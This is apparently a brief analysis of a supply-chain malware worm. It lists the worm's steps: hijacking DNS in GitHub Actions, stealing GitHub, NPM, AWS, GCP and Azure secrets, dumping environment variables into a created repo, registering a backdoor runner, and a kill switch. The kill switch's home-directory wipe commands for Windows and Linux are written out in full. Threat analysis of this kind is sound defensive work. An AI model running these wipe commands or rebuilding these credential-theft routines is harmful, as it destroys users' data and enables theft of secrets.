🟡GitHub Persistence / Token Theft
🟡AWS Credential Harvesting
🟡GCP Secret Manager Theft
🟡Azure Vault Secret Theft
🟡DNS Hijack in GitHub Actions
🟡Repo-Creation as Exfil-Channel
🟡NPM Token Extraction
🟡Local Secrets Scanning
🟡Wipe-Your-Home-Directory Kill-Switch
🟡Firewall Manipulation
🟡Actions Runner Dropper
🟡"Bun" Installer Stub
🟡TruffleHog Scanner (for extra Secrets)


GitHub Actions Hijack 👩‍💻

installDnsHijackAndOpenFirewall()
⚙️ DNS manipulation + iptables flush
✅ Goal: Force GitHub Runner into a controlled environment.

GitHub Token Steal + Repo as "C2" 👩‍💻

Exfiltration of all GitHub secrets:

exfiltrateAllAccessibleSecrets()
⚙️ Reads repo list → Writes actionsSecrets.json to repo

Repo creation with runner backdoor

github.createRepo(secureId())
⚙️ Creates repo
⚙️ Registers Actions runner "SHA1HULUD"

NPM Token Hijack 👩‍💻

Function: extractNpmToken()
⚙️ Searches .npmrc in $HOME & CWD

AWS secrets theft 👩‍💻

🟡Uses official AWS SDK client
🟡Google Cloud secret theft
🟡Uses @google-cloud/secret-manager

Azure secret theft 👩‍💻

🟡Uses Azure KeyVault secrets

System report + environment dump  👩‍💻

environmentDump = { environment: process.env }
⚙️ exfiltrates all ENV variables ("CICD Secret Dump")

Home Directory Secret Scanner 🔍

scanHomeForSecrets(github)
⚙️ searches $HOME for files
⚙️ uploads everything to the repo

Local Kill Switch (Data Destruction) 🗑

If it doesn't get any tokens, then:

🔷 Windows:

del /F /Q /S “%USERPROFILE%*”
rd /S /Q
cipher /W:%USERPROFILE%

🔲 Linux:

find $HOME -type f -writable ... shred -uvz
find $HOME -empty -delete

⚠️ This is a complete personal data wipe.

TruffleHog scanner for extra secrets ⌨️

The entire TruffleHog installer + binary downloader is contained in the  script.

⚙️ Additionally scans for API keys/passwords in the file system.

Bun Installer Dropper 👩‍💻

The huge code block for installing bun + environment reload